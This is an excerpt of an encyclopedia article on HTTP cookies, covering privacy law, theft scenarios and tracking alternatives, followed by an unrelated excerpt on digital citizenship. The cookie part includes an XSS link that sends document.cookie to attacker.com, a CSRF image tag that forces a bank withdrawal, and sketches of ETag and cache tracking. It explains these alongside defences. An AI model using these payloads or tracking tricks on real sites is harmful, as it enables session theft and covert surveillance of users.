The older standards for cookies, RFC 2109[17] and RFC 2965, recommend that browsers should protect user privacy and not allow sharing of cookies between servers by default. However, the newer standard, RFC 6265, explicitly allows user agents to implement whichever third-party cookie policy they wish. Most modern web browsers contain privacy settings that can block third-party cookies. Since 2020, Apple Safari,[65] Firefox,[66] and Brave[67] block all third-party cookies by default. Safari allows embedded sites to use the Storage Access API to request permission to set first-party cookies. In May 2020, Google Chrome 83 introduced new features to block third-party cookies by default in its Incognito mode for private browsing, making blocking optional during normal browsing. The same update also added an option to block first-party cookies.[68] In April 2024, Chrome postponed third-party cookie blocking by default to 2025.[69] In July 2024, Google announced a plan to avoid blocking third-party cookies by default and instead prompt users to allow third-party cookies.[70]
The possibility of building a profile of users is a privacy threat, especially when tracking is done across multiple domains using third-party cookies. For this reason, some countries have legislation about cookies.
Website operators who do not disclose third-party cookie use to consumers run the risk of harming consumer trust if cookie use is discovered. Having clear disclosure (such as in a privacy policy) tends to eliminate any negative effects of such cookie discovery.[71][failed verification]
The United States government set strict rules on setting cookies in 2000 after it was disclosed that the White House drug policy office used cookies to track computer users viewing its online anti-drug advertising. In 2002, privacy activist Daniel Brandt found that the CIA had been leaving persistent cookies on computers that had visited its website. When notified it was violating policy, the CIA stated that these cookies were not intentionally set and stopped setting them. On December 25, 2005, Brandt discovered that the National Security Agency (NSA) had been leaving two persistent cookies on visitors' computers due to a software upgrade. After being informed, the NSA immediately disabled the cookies.[72]
In 2002, the European Union launched the Directive on Privacy and Electronic Communications (e-Privacy Directive), a policy requiring end users' consent for the placement of cookies and similar technologies for storing and accessing information on users' equipment.[73][74] In particular, Article 5 Paragraph 3 mandates that storing technically unnecessary data on a user's computer can only be done if the user is provided information about how this data is used, and the user is given the possibility of denying this storage operation. The Directive does not require users to authorise or be provided notice of cookie usage that is functionally required for delivering a service they have requested, for example to retain settings, store log-in sessions, or remember what is in a user's shopping basket.[75]
In 2009, the law was amended by Directive 2009/136/EC, which included a change to Article 5, Paragraph 3. Instead of having an option for users to opt out of cookie storage, the revised Directive requires consent to be obtained for cookie storage.[74] The definition of consent is cross-referenced to the definition in European data protection law, firstly the Data Protection Directive 1995 and subsequently the General Data Protection Regulation (GDPR). As the definition of consent was strengthened in the text of the GDPR, this had the effect of increasing the quality of consent required by those storing and accessing information such as cookies on users' devices. In a case decided under the Data Protection Directive, however, the Court of Justice of the European Union later confirmed that the previous law implied the same strong quality of consent as the current instrument.[76] In addition to the requirement of consent which stems from storing or accessing information on a user's terminal device, the information in many cookies will be considered personal data under the GDPR alone, and will require a legal basis to process. This has been the case since the 1995 Data Protection Directive, which used an identical definition of personal data, although the GDPR in interpretative Recital 30 clarifies that cookie identifiers are included. While not all data processing under the GDPR requires consent, the characteristics of behavioural advertising mean that it is difficult or impossible to justify under any other ground.[77][78]
Consent under the combination of the GDPR and e-Privacy Directive has to meet a number of conditions in relation to cookies.[79] It must be freely given and unambiguous: preticked boxes were banned under both the Data Protection Directive 1995[76] and the GDPR (Recital 32).[80] The GDPR is specific that consent must be as 'easy to withdraw as to give',[80] meaning that a reject-all button must be as easy to access in terms of clicks and visibility as an 'accept all' button.[79] It must be specific and informed, meaning that consent relates to particular purposes for the use of this data, and all organisations seeking to use this consent must be specifically named.[81][82] The Court of Justice of the European Union has also ruled that consent must be 'efficient and timely', meaning that it must be gained before cookies are laid and data processing begins, not afterwards.[83]
The industry's response has been largely negative. Robert Bond of the law firm Speechly Bircham describes the effects as "far-reaching and incredibly onerous" for "all UK companies". Simon Davis of Privacy International argues that proper enforcement would "destroy the entire industry".[84] However, scholars note that the onerous nature of cookie pop-ups stems from an attempt to continue to operate a business model through convoluted requests that may be incompatible with the GDPR.[77]
Academic studies and regulators both describe widespread non-compliance with the law. A study scraping 10,000 UK websites found that only 11.8% of sites adhered to minimal legal requirements, with only 33.4% of websites studied providing a mechanism to reject cookies that was as easy to use as accepting them.[79] A study of 17,000 websites found that 84% of sites breached this criterion, finding additionally that many laid third-party cookies with no notice at all.[85] The UK regulator, the Information Commissioner's Office, stated in 2019 that the industry's 'Transparency and Consent Framework' from the advertising technology group the Interactive Advertising Bureau was 'insufficient to ensure transparency and fair processing of the personal data in question and therefore also insufficient to provide for free and informed consent, with attendant implications for PECR [e-Privacy] compliance.'[81] Many companies that sell compliance solutions (Consent Management Platforms) permit them to be configured in manifestly illegal ways, which scholars have noted creates questions around the appropriate allocation of liability.[86]
A W3C specification called P3P was proposed for servers to communicate their privacy policy to browsers, allowing automatic, user-configurable handling. However, few websites implement the specification, and the W3C has discontinued work on it.[87]
Third-party cookies can be blocked by most browsers to increase privacy and reduce tracking by advertising and tracking companies without negatively affecting the user's web experience on all sites. Some sites operate 'cookie walls', which make access to a site conditional on allowing cookies either technically in a browser, through pressing 'accept', or both.[88] In 2020, the European Data Protection Board, composed of all EU data protection regulators, stated that cookie walls were illegal.
In order for consent to be freely given, access to services and functionalities must not be made conditional on the consent of a user to the storing of information, or gaining of access to information already stored, in the terminal equipment of a user (so called cookie walls).[89]
Many advertising operators offer an opt-out option for behavioural advertising, with a generic cookie in the browser stopping behavioural advertising.[90][91] However, this is often ineffective against many forms of tracking, such as first-party tracking that is growing in popularity to avoid the impact of browsers blocking third-party cookies.[92][93] Furthermore, if such a setting is more difficult to configure than the acceptance of tracking, it remains in breach of the conditions of the e-Privacy Directive.[79]
Most websites use cookies as the only identifiers for user sessions, because other methods of identifying web users have limitations and vulnerabilities. If a website uses cookies as session identifiers, attackers can impersonate users' requests by stealing a full set of victims' cookies. From the web server's point of view, a request from an attacker then has the same authentication as the victim's requests; thus the request is performed on behalf of the victim's session.
Listed here are various scenarios of cookie theft and user session hijacking (even without stealing user cookies) that work with websites relying solely on HTTP cookies for user identification.
Traffic on a network can be intercepted and read by computers on the network other than the sender and receiver (particularly over unencrypted open Wi-Fi). This traffic includes cookies sent on ordinary unencrypted HTTP sessions. Where network traffic is not encrypted, attackers can therefore read the communications of other users on the network, including HTTP cookies as well as the entire contents of the conversations, for the purpose of a man-in-the-middle attack.
An attacker could use intercepted cookies to impersonate a user and perform a malicious task, such as transferring money out of the victim's bank account.
This issue can be resolved by securing the communication between the user's computer and the server by employing Transport Layer Security (HTTPS protocol) to encrypt the connection. A server can specify the Secure flag while setting a cookie, which will cause the browser to send the cookie only over an encrypted channel, such as a TLS connection.[45]
If an attacker is able to cause a DNS server to cache a fabricated DNS entry (called DNS cache poisoning), then this could allow the attacker to gain access to a user's cookies. For example, an attacker could use DNS cache poisoning to create a fabricated DNS entry of f12345.www.example.com that points to the IP address of the attacker's server. The attacker can then post an image URL from his own server (for example, http://f12345.www.example.com/img_4_cookie.jpg). Victims reading the attacker's message would download this image from f12345.www.example.com. Since f12345.www.example.com is a sub-domain of www.example.com, victims' browsers would submit all example.com-related cookies to the attacker's server.
If an attacker is able to accomplish this, it is usually the fault of the Internet Service Providers for not properly securing their DNS servers. However, the severity of this attack can be lessened if the target website uses secure cookies. In this case, the attacker would have the extra challenge[94] of obtaining the target website's TLS certificate from a certificate authority, since secure cookies can only be transmitted over an encrypted connection. Without a matching TLS certificate, victims' browsers would display a warning message about the attacker's invalid certificate, which would help deter users from visiting the attacker's fraudulent website and sending the attacker their cookies.
Cookies can also be stolen using a technique called cross-site scripting. This occurs when an attacker takes advantage of a website that allows its users to post unfiltered HTML and JavaScript content. By posting malicious HTML and JavaScript code, the attacker can cause the victim's web browser to send the victim's cookies to a website the attacker controls.
As an example, an attacker may post a message on www.example.com with a link of the following form, whose onclick handler forwards the reader's cookies to a server the attacker controls (attacker.com):
<a href="#" onclick="window.location = 'http://attacker.com/stole.cgi?text=' + escape(document.cookie); return false;">Click here!</a>
When another user clicks on this link, the browser executes the piece of code within the onclick attribute, thus replacing the string document.cookie with the list of cookies that are accessible from the current page. As a result, this list of cookies is sent to the attacker.com server. If the attacker's malicious posting is on the HTTPS website https://www.example.com, secure cookies will also be sent to attacker.com in plain text.
It is the responsibility of the website developers to filter out such malicious code.
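One standard way to "filter out" such code is to escape user-supplied text before embedding it in a page, so that markup is displayed as text rather than executed. A minimal sketch using Python's standard html module; the post content is an illustrative injection attempt:

```python
import html

# A user "post" containing a script-injection attempt.
malicious_post = '<script>location="http://attacker.com/?c=" + document.cookie</script>'

# Escaping converts markup characters into HTML entities, so the
# browser renders the post as inert text instead of running it.
safe_post = html.escape(malicious_post)
print(safe_post)
```

Escaping on output is only one layer; frameworks typically combine it with input validation and the HttpOnly cookies described below.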
Such attacks can be mitigated by using HttpOnly cookies. These cookies will not be accessible by client-side scripting languages like JavaScript, and therefore, the attacker will not be able to gather these cookies.
In older versions of many browsers, there were security holes in the implementation of the XMLHttpRequest API. This API allows pages to specify a proxy server that would get the reply, and this proxy server is not subject to the same-origin policy. For example, a victim is reading an attacker's posting on www.example.com, and the attacker's script is executed in the victim's browser. The script generates a request to www.example.com with the proxy server attacker.com. Since the request is for www.example.com, all example.com cookies will be sent along with the request, but routed through the attacker's proxy server. Hence, the attacker would be able to harvest the victim's cookies.
This attack would not work with secure cookies, since they can only be transmitted over HTTPS connections, and the HTTPS protocol dictates end-to-end encryption (i.e. the information is encrypted on the user's browser and decrypted on the destination server). In this case, the proxy server would only see the raw, encrypted bytes of the HTTP request.
For example, Bob might be browsing a chat forum where another user, Mallory, has posted a message. Suppose that Mallory has crafted an HTML image element that references an action on Bob's bank's website (rather than an image file), e.g.,
<img src="http://bank.example.com/withdraw?account=bob&amount=1000000&for=mallory">
If Bob's bank keeps his authentication information in a cookie, and if the cookie hasn't expired, then the attempt by Bob's browser to load the image will submit the withdrawal form with his cookie, thus authorizing a transaction without Bob's approval.
Cookiejacking is an attack against Internet Explorer which allows the attacker to steal session cookies of a user by tricking the user into dragging an object across the screen.[95] Microsoft deemed the flaw low-risk because of "the level of required user interaction"[95] and the necessity of having a user already logged into the website whose cookie is stolen.[96] Despite this, a researcher tried the attack on 150 of their Facebook friends and obtained cookies of 80 of them via social engineering.[95]
Besides privacy concerns, cookies also have some technical drawbacks. In particular, they do not always accurately identify users, they can be used for security attacks, and they are often at odds with the Representational State Transfer (REST) software architectural style.[97][98]
If more than one browser is used on a computer, each usually has a separate storage area for cookies. Hence, cookies do not identify a person, but a combination of a user account, a computer, and a web browser. Thus, anyone who uses multiple accounts, computers, or browsers has multiple sets of cookies.[99]
Likewise, cookies do not differentiate between multiple users who share the same user account, computer, and browser.
Some of the operations that can be done using cookies can also be done using other mechanisms.
A JSON Web Token (JWT) is a self-contained packet of information that can be used to store user identity and authenticity information. This allows them to be used in place of session cookies. Unlike cookies, which are automatically attached to each HTTP request by the browser, JWTs must be explicitly attached to each HTTP request by the web application.
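A JWT consists of three base64url-encoded segments (header, payload, signature) joined by dots, with the signature binding the payload to a server-side key. A simplified sketch of an HMAC-SHA256 ("HS256") token using only the Python standard library; the key and claims are illustrative, and real applications should use a vetted JWT library:

```python
import base64
import hashlib
import hmac
import json

def b64url(data: bytes) -> str:
    # base64url without padding, as JWTs use (RFC 7515)
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def make_jwt(payload: dict, key: bytes) -> str:
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = b64url(json.dumps(header).encode()) + "." + b64url(json.dumps(payload).encode())
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)

def verify_jwt(token: str, key: bytes) -> bool:
    # Recompute the signature over the first two segments and compare.
    signing_input, _, sig = token.rpartition(".")
    expected = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return hmac.compare_digest(b64url(expected), sig)

token = make_jwt({"sub": "user42", "admin": False}, b"server-secret")
# Unlike a cookie, the application must attach this token to each
# request itself, e.g. in an "Authorization: Bearer <token>" header.
```

Because the token carries its own signed state, the server need not keep a session table; tampering with the payload invalidates the signature.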
The HTTP protocol includes the basic access authentication and the digest access authentication protocols, which allow access to a web page only when the user has provided the correct username and password. If the server requires such credentials for granting access to a web page, the browser requests them from the user and, once obtained, the browser stores and sends them in every subsequent page request. This information can be used to track the user.
The query string part of the URL is the part that is typically used for this purpose, but other parts can be used as well. The Java Servlet and PHP session mechanisms both use this method if cookies are not enabled.
This method consists of the web server appending query strings containing a unique session identifier to all the links inside of a web page. When the user follows a link, the browser sends the query string to the server, allowing the server to identify the user and maintain state.
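The rewriting step just described can be sketched with Python's standard urllib.parse: the server appends its session identifier to every emitted link and parses it back out of each incoming request. The parameter name sid is illustrative (Java Servlets use jsessionid, PHP uses PHPSESSID):

```python
from urllib.parse import parse_qs, urlencode, urlsplit, urlunsplit

def add_session_id(url: str, session_id: str) -> str:
    # Append sid=<session_id> to the URL's query string,
    # preserving any query parameters already present.
    parts = urlsplit(url)
    query = parts.query + ("&" if parts.query else "") + urlencode({"sid": session_id})
    return urlunsplit((parts.scheme, parts.netloc, parts.path, query, parts.fragment))

def get_session_id(url: str):
    # Recover the identifier from a followed link on the next request.
    return parse_qs(urlsplit(url).query).get("sid", [None])[0]

link = add_session_id("http://example.com/page?x=1", "abc123")
# link is "http://example.com/page?x=1&sid=abc123"
```

Since every link on the page must be rewritten this way, the identifier travels with the user's clicks instead of with a cookie header.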
These kinds of query strings are very similar to cookies in that both contain arbitrary pieces of information chosen by the server and both are sent back to the server on every request. However, there are some differences. Since a query string is part of a URL, if that URL is later reused, the same attached piece of information will be sent to the server, which could lead to confusion. For example, if the preferences of a user are encoded in the query string of a URL and the user sends this URL to another user by e-mail, those preferences will be used for that other user as well.
Moreover, if the same user accesses the same page multiple times from different sources, there is no guarantee that the same query string will be used each time. For example, if a user visits a page by coming from a page internal to the site the first time, and then visits the same page by coming from an external search engine the second time, the query strings would likely be different. If cookies were used in this situation, the cookies would be the same.
Other drawbacks of query strings are related to security. Storing data that identifies a session in a query string enables session fixation attacks, referer logging attacks and other security exploits. Transferring session identifiers as HTTP cookies is more secure.
Another form of session tracking is to use web forms with hidden fields. This technique is very similar to using URL query strings to hold the information and has many of the same advantages and drawbacks. In fact, if the form is handled with the HTTP GET method, then this technique is similar to using URL query strings, since the GET method adds the form fields to the URL as a query string. But most forms are handled with HTTP POST, which causes the form information, including the hidden fields, to be sent in the HTTP request body, which is neither part of the URL, nor of a cookie.
This approach presents two advantages from the point of view of the tracker. First, having the tracking information placed in the HTTP request body rather than in the URL means it will not be noticed by the average user. Second, the session information is not copied when the user copies the URL (to bookmark the page or send it via email, for example).
All current web browsers can store a fairly large amount of data (2–32 MB) via JavaScript using the DOM property window.name. This data can be used instead of session cookies. The technique can be coupled with JSON/JavaScript objects to store complex sets of session variables on the client side.
The downside is that every separate window or tab will initially have an empty window.name property when opened.
In some respects, this can be more secure than cookies because its contents are not automatically sent to the server on every request like cookies are, so it is not vulnerable to network cookie sniffing attacks.
Some users may be tracked based on the IP address of the computer requesting the page. The server knows the IP address of the computer running the browser (or the proxy, if any is used) and could theoretically link a user's session to this IP address.
However, IP addresses are generally not a reliable way to track a session or identify a user. Many computers designed to be used by a single user, such as office PCs or home PCs, are behind a network address translator (NAT). This means that several PCs will share a public IP address. Furthermore, some systems, such as Tor, are designed to retain Internet anonymity, rendering tracking by IP address impractical, impossible, or a security risk.
Because ETags are cached by the browser, and returned with subsequent requests for the same resource, a tracking server can simply repeat any ETag received from the browser to ensure an assigned ETag persists indefinitely (in a similar way to persistent cookies). Additional caching header fields can also enhance the preservation of ETag data.
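The tracking logic itself is small: if a request carries an If-None-Match header, the server echoes that value back as the ETag; otherwise it mints a fresh identifier. A hedged sketch of that server-side decision (the header names follow HTTP, but the function and request representation are illustrative):

```python
import uuid

def etag_for_request(request_headers: dict) -> str:
    """Return the ETag to send for a tracked resource.

    A cooperating browser replays the last ETag it saw in the
    If-None-Match header, so echoing it back makes the identifier
    persist indefinitely, much like a persistent cookie.
    """
    previous = request_headers.get("If-None-Match")
    if previous is not None:
        return previous  # returning visitor: keep their identifier alive
    return '"' + uuid.uuid4().hex + '"'  # first visit: mint a new identifier

first = etag_for_request({})                          # new visitor
second = etag_for_request({"If-None-Match": first})   # identifier echoed back
```

Clearing the browser cache discards the stored ETag, which is why the next paragraph notes that as the user's only recourse.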
ETags can be flushed in some browsers by clearing the browser cache.
The browser cache can also be used to store information that can be used to track individual users. This technique takes advantage of the fact that the web browser will use resources stored within the cache instead of downloading them from the website when it determines that the cache already has the most up-to-date version of the resource.
For example, a website could serve a JavaScript file with code that sets a unique identifier for the user (for example, var userId = 3243242;). After the user's initial visit, every time the user accesses the page, this file will be loaded from the cache instead of downloaded from the server. Thus, its content will never change.
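Server-side, this technique amounts to serving each first-time visitor a uniquely generated script with far-future caching headers, so later visits replay the same identifier from cache. A minimal sketch; the userId variable mirrors the example above, while the function name, counter, and header values are illustrative:

```python
import itertools

# Monotonic counter standing in for a per-visitor ID store;
# the starting value matches the example in the text.
_next_id = itertools.count(3243242)

def serve_tracking_script():
    # Each first download embeds a fresh identifier. Cache-Control tells
    # the browser to reuse its cached copy for ten years, so the same
    # userId value is replayed on every later visit without a cookie.
    body = "var userId = %d;" % next(_next_id)
    headers = {
        "Content-Type": "application/javascript",
        "Cache-Control": "max-age=315360000, immutable",
    }
    return headers, body

headers, body = serve_tracking_script()
```

The identifier never travels in a cookie header; it lives in the cached resource itself, which is why clearing the cache is the countermeasure.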
A browser fingerprint is information collected about a browser's configuration, such as version number, screen resolution, and operating system, for the purpose of identification. Fingerprints can be used to fully or partially identify individual users or devices even when cookies are turned off.
Basic web browser configuration information has long been collected by web analytics services in an effort to accurately measure real human web traffic and discount various forms of click fraud. With the assistance of client-side scripting languages, collection of much more esoteric parameters is possible.[100][101] Assimilation of such information into a single string constitutes a device fingerprint. In 2010, EFF measured at least 18.1 bits of entropy possible from browser fingerprinting.[102] Canvas fingerprinting, a more recent technique, claims to add another 5.7 bits.
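The "bits of entropy" figure measures how identifying a fingerprint is: a configuration shared by one browser in N carries log2(N) bits of identifying information. The EFF study's 18.1-bit figure corresponds to a fingerprint shared by roughly one browser in 286,777, which can be checked directly:

```python
import math

# Self-information of a fingerprint shared by one browser in N:
# I = log2(N) bits. The EFF's Panopticlick study reported that a
# typical fingerprint was shared by about 1 in 286,777 browsers.
one_in_n = 286_777
bits = math.log2(one_in_n)
print(round(bits, 1))
```

By the same arithmetic, adding canvas fingerprinting's claimed 5.7 bits multiplies the distinguishable population by about 2^5.7, roughly a factor of 52.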
Some web browsers support persistence mechanisms which allow the page to store the information locally for later use.
The HTML5 standard (which most modern web browsers support to some extent) includes a JavaScript API called Web storage that allows two types of storage: local storage and session storage. Local storage behaves similarly to persistent cookies, while session storage behaves similarly to session cookies, except that session storage is tied to an individual tab/window's lifetime (also known as a page session), not to a whole browser session like session cookies.[103]
Internet Explorer supports persistent information[104] in the browser's history, in the browser's favorites, in an XML store ("user data"), or directly within a web page saved to disk.
Some web browser plugins include persistence mechanisms as well. For example, Adobe Flash has Local shared objects and Microsoft Silverlight has Isolated Storage.[105]
https://en.wikipedia.org/wiki/HTTP_cookie
The term digital citizen is used with different meanings. According to the definition provided by Karen Mossberger, one of the authors of Digital Citizenship: The Internet, Society, and Participation,[1] digital citizens are "those who use the internet regularly and effectively." In this sense, a digital citizen is a person using information technology (IT) in order to engage in society, politics, and government.
More recent elaborations of the concept define digital citizenship as the self-enactment of people's role in society through the use of digital technologies, stressing the empowering and democratizing characteristics of the citizenship idea. These theories aim at taking into account the ever increasing datafication of contemporary societies (as can be symbolically linked to the Snowden leaks), which radically called into question the meaning of "being (digital) citizens in a datafied society",[2] also referred to as the "algorithmic society",[3] which is characterised by the increasing datafication of social life and the pervasive presence of surveillance practices (see surveillance and surveillance capitalism), the use of artificial intelligence, and Big Data.
Datafication presents crucial challenges for the very notion of citizenship: data collection can no longer be seen as an issue of privacy alone,[2] so that:
We cannot simply assume that being a citizen online already means something (whether it is the ability to participate or the ability to stay safe) and then look for those whose conduct conforms to this meaning[4]
Instead, the idea of digital citizenship shall reflect the idea that we are no longer mere “users” of technologies since they shape our agency both as individuals and as citizens.
Digital citizenship is the responsible and respectful use of technology to engage online, find reliable sources, and protect and promote human rights.[1][2][3][4]It teaches skills to communicate, collaborate, and act positively on any online platform.[2][3]It also teaches empathy, privacy protection, and security measures to prevent data breaches and identity theft.
In the context of the algorithmic society, the question of digital citizenship "becomes one of the extents to which subjects are able to challenge, avoid or mediate their data double in this datafied society”.[2]
These reflections put the emphasis on the idea of the digital space (or cyberspace) as a political space where the respect of fundamental rights of the individual shall be granted (with reference both to the traditional ones as well as to new specific rights of the internet [see "digital constitutionalism"]) and where the agency and the identity of the individuals as citizens is at stake. This idea of digital citizenship is thought to be not only active but also performative, in the sense that "in societies that are increasingly mediated through digital technologies, digital acts become important means through which citizens create, enact and perform their role in society."[2]
In particular, for Isin and Ruppert this points towards an active meaning of (digital) citizenship based on the idea that we constitute ourselves as digital citizen by claiming rights on the internet, either by saying or by doing something.[4]
People who characterize themselves as digital citizens often use IT extensively, creating blogs, using social networks, and participating in online journalism.[5] Although digital citizenship begins when any child, teen, or adult signs up for an email address, posts pictures online, uses e-commerce to buy merchandise online, and/or participates in any electronic function that is B2B or B2C, the process of becoming a digital citizen goes beyond simple internet activity. According to Thomas Humphrey Marshall, a British sociologist known for his work on social citizenship, a primary framework of citizenship comprises three different traditions: liberalism, republicanism, and ascriptive hierarchy. Within this framework, the digital citizen needs to exist in order to promote equal economic opportunities and increase political participation.[6] In this way, digital technology helps to lower the barriers to entry for participation as a citizen within a society.
They also have a comprehensive understanding of digital citizenship, which is the appropriate and responsible behavior when using technology.[7] Since digital citizenship evaluates the quality of an individual's response to membership in a digital community, it often requires the participation of all community members, both visible and those who are less visible.[8] A large part in being a responsible digital citizen encompasses digital literacy, etiquette, online safety, and an acknowledgement of private versus public information.[9][10][11] The development of digital citizen participation can be divided into two main stages.[12]
The first stage is through information dissemination, which includes subcategories of its own:[12]
The second stage of digital citizen participation is citizen deliberation, which evaluates the type of participation and role that citizens play when attempting to ignite some sort of policy change.
One of the primary advantages of participating in online debates through digital citizenship is that it incorporates social inclusion. In a report on civic engagement, citizen-powered democracy can be initiated through information shared on the web, direct communication from the state toward the public, or social media tactics from both private and public companies.[13] In fact, it was found that the community-based nature of social media platforms allows individuals to feel more socially included and informed about political issues that peers have also been found to engage with, otherwise known as a "second-order effect."[14] Understanding strategic marketing on social media would further explain social media customers' participation. Two types of opportunities arise as a result, the first being the ability to lower barriers that can make exchanges much easier. In addition, people with historically lower political engagement get the chance to participate in transformative disruption, mobilizing in a much easier and more convenient fashion.
Nonetheless, there are several challenges that face the presence of digital technologies in political participation. Both current and potential challenges can create significant risks for democratic processes. Not only is digital technology still seen as relatively ambiguous, it was also seen to have "less inclusivity in democratic life."[15] Demographic groups differ considerably in the use of technology, and thus, one group could potentially be more represented than another as a result of digital participation. Another primary challenge is the "filter bubble" effect. Alongside a tremendous spread of false information, internet users could reinforce existing prejudices and assist in polarizing disagreements in the public sphere. This can lead to misinformed voting and decisions based on exposure rather than on pure knowledge. A communication technology director, Van Dijk,[16] stated, "Computerized information campaigns and mass public information systems have to be designed and supported in such a way that they help to narrow the gap between the 'information rich' and 'information poor' otherwise the spontaneous development of ICT will widen it." Access to digital technology, and the knowledge needed to use it, must be equivalent in order for a fair system to be put into place.
Alongside a lack of evidenced support for technology that can be proven to be safe for citizens, the OECD has identified five struggles for the online engagement of citizens:[17]
Highly developed states possess the capacity to link their respective governments with digital sites. Such sites function in ways such as publicizing recent legislation and current and future policy objectives; lending agency toward political candidates; and/or allowing citizens to voice themselves in a political way. Likewise, the emergence of these sites has been linked to increased voting advocacy. Lack of access to technology can be a serious obstacle in becoming a digital citizen, since many elementary procedures such as tax report filing, birth registration, and use of websites to support candidates in political campaigns (e-democracy) have become available solely via the internet. Furthermore, many cultural and commercial entities only publicize information on web pages. Non-digital citizens will not be able to retrieve this information, and this may lead to social isolation or economic stagnation.[citation needed]
The gap between digital citizens and non-digital citizens is often referred to as the digital divide. In developing countries, digital citizens are fewer. They consist of the people who use technology to overcome local obstacles including development issues, corruption, and even military conflict.[18] Examples of such citizens include users of Ushahidi during the disputed 2007 Kenyan election and protesters in the Arab Spring movements who used media to document repression of protests. Currently, the digital divide is a subject of academic debate as access to the internet has increased in these developing countries, but the place in which it is accessed (work, home, public library, etc.) has a significant effect on how much access will be used, if even in a manner related to the citizenry. Recent scholarship has correlated the desire to be technologically proficient with greater belief in computer access equity, and thus, digital citizenship (Shelley, et al.).[full citation needed]
On the other side of the divide, one example of a highly developed digital technology program in a wealthy state is the e-Residency of Estonia. This form of digital residency allows both citizens and non-citizens of the state to pursue business opportunities in a digital business environment.[19] The application is simple; residents can fill out a form with their passport and photograph alongside the reason for applying. Following a successful application, the "e-residency" will allow them to register a company, sign documents, make online banking declarations, and file medical prescriptions online, though they will be tracked through financial footprints. The project plans to cover over 10 million e-residents by 2025, and as of April 2019, there were over 54,000 participants from over 162 countries that have expressed an interest, contributing millions of dollars to the country's economy and assisting in access to any public service online.[20] Other benefits include hassle-free administration, lower business costs, access to the European Union market, and a broad range of e-services.[21] Though the program is designed for entrepreneurs, Estonia hopes to value transparency and resourcefulness as a cause for other companies to implement similar policies domestically. In 2021, Estonia's neighbor Lithuania launched a similar e-Residency program.[22]
Nonetheless, Estonia's e-Residency system has been subject to criticism. Many have pointed out that tax treaties within their own countries will play a major role in preventing this idea from spreading to more countries. Another risk is political: governments must sustain "funding and legislative priorities across different coalitions of power."[23] Most importantly, the threat of cyberattacks may disrupt the seemingly optimal idea of having a platform for eIDs, as Estonia suffered its own massive cyberattack in 2007 by Russian hacktivists. Today, the protection of digital services and databases is essential to national security, and many countries are still hesitant to take the next step forward to promote a new system that will change the scale of politics with all its citizens.[citation needed]
Within developed countries, the digital divide, other than economic differences, is attributed to educational levels. A study conducted by the United States National Telecommunications and Information Administration determined that the gaps in computer usage and internet access widened by 7.8% and 25%, respectively, between the most and the least educated, and it has been observed that those with college degrees or higher are 10 times more likely to have internet access at work when compared with those with only a high school education.[24]
A digital divide often extends along specific racial lines as well. The difference in computer usage grew by 39.2% between White and Black households and by 42.6% between White and Hispanic households only three years ago.[when?] Race can also affect the number of computers at school, and as expected, gaps between racial groups narrow at higher income levels while widening among households at lower economic levels. Racial disparities have been proven to exist irrespective of income, and in a cultural study to determine reasons for the divide other than income, with regard to the Hispanic community, computers were seen as a luxury, not a need. Participants collectively stated that computer activities isolated individuals and took away valuable time from family activities. In the African-American community, it was observed that they historically have had negative encounters with technological innovations, and with Asian-Americans, education was emphasized, and thus, there was a larger number of people who embraced the rise in technological advances.[25]
An educational divide also takes place as a result of differences in the use of daily technology. In a report analyzed by the ACT Center for Equity in Learning, "85% of respondents reported having access to anywhere from two to five devices at home. The remaining one percent of respondents reported having access to no devices at home."[26] For the 14% of respondents with one device at home, many of them reported the need to share these devices with other household members, facing challenges that are often overlooked. The data all suggest that wealthier families have access to more devices. In addition, out of the respondents that only used one device at home, 24% of them lived in rural areas, and over half reported that this one device was a smartphone; this could make completing schoolwork assignments more difficult. The ACT recommended that underserved students need access to more devices and higher-quality networks, and educators should do their best to ensure that students can find as many electronic materials through their phones to not place a burden on family plans.[citation needed]
A recent survey revealed that teenagers and young adults spend more time on the internet than watching TV. This has raised a number of concerns about how internet use could impact cognitive abilities.[27] According to a study by Wartella et al., teens are concerned about how digital technologies may have an impact on their health.[28] Digital youth can generally be viewed as the test market for the next generation's digital content and services. Sites such as Myspace and Facebook have come to the fore in sites where youth participate and engage with others on the internet. However, due to the lack of popularity of Myspace in particular, more young people are turning to websites such as Snapchat, Instagram, and YouTube.[29] It was reported that teenagers spend up to nine hours a day online, with the vast majority of that time spent on social media websites from mobile devices, contributing to the ease of access and availability to young people.[30] Vast amounts of money are spent annually to research the demographic by hiring psychologists, sociologists and anthropologists in order to discover habits, values and fields of interest.[citation needed]
Particularly in the United States, "Social media use has become so pervasive in the lives of American teens that having a presence on a social network is almost synonymous with being online; 95% of all teens ages 12-17 are now online and 80% of those online teens are users of social media sites".[31][needs update] However, movements such as these appear to benefit strictly those wishing to advocate for their business towards youth. The critical time when young people are developing their civic identities is between the ages of 15 and 22. During this time they develop three attributes (civic literacy, civic skills, and civic attachment) that constitute civic engagement, later reflected in the political actions of their adult lives.[citation needed]
For youth to fully participate and realize their presence on the internet, a quality level of reading comprehension is required. "The average government web site, for example, requires an eleventh-grade level of reading comprehension, even though about half of the U.S. population reads at an eighth-grade level or lower".[32] So although the internet is in principle open irrespective of factors such as race, religion, and class, education plays a large part in a person's capacity to present themselves online in a formal manner conducive towards their citizenry. Concurrently, education also affects people's motivation to participate online.[citation needed]
Students should be encouraged to use technology with responsibility and ethical digital citizenship promoted. Education on harmful viruses and othermalwaremust be emphasized to protect resources. A student can be a successful digital citizen with the help of educators, parents, and school counselors.[33]
These five competencies will assist and support teachers in teaching about digital citizenship:[34]
Inclusive: I am open to hearing and respectfully recognizing multiple viewpoints, and I engage with others online with respect and empathy.
Informed: I evaluate the accuracy, perspective, and validity of digital media and social posts.
Engaged: I use technology and digital channels for civic engagement, to solve problems and be a force for good in both physical and virtual communities.
Balanced: I make informed decisions about how to prioritize my time and activities online and off.
Alert: I am aware of my online actions, and know how to be safe and create safe spaces for others online.
International OECD guidelines state that "personal data should be relevant to the purposes for which they are to be used, and to the extent necessary for those purposes should be accurate, complete, and kept up to date". Article 8, subject to certain exceptions, prohibits publishing online data that reveals race, ethnicity, religion, political stance, health, or sex life. In the United States, this is enforced generally by the Federal Trade Commission (FTC), though only in general terms. For example, the FTC brought an action against Microsoft for failing to properly protect customers' personal information.[35] In addition, many have described the United States as being in a cyberwar with Russia, and several Americans have blamed Russia for their country's decline in transparency and in trust in the government. With several foreign users posting anonymous information through social media in order to gather a following, it is difficult to understand whom to target and what affiliation or root cause they may have for performing a particular action aimed to sway public opinion.[36]
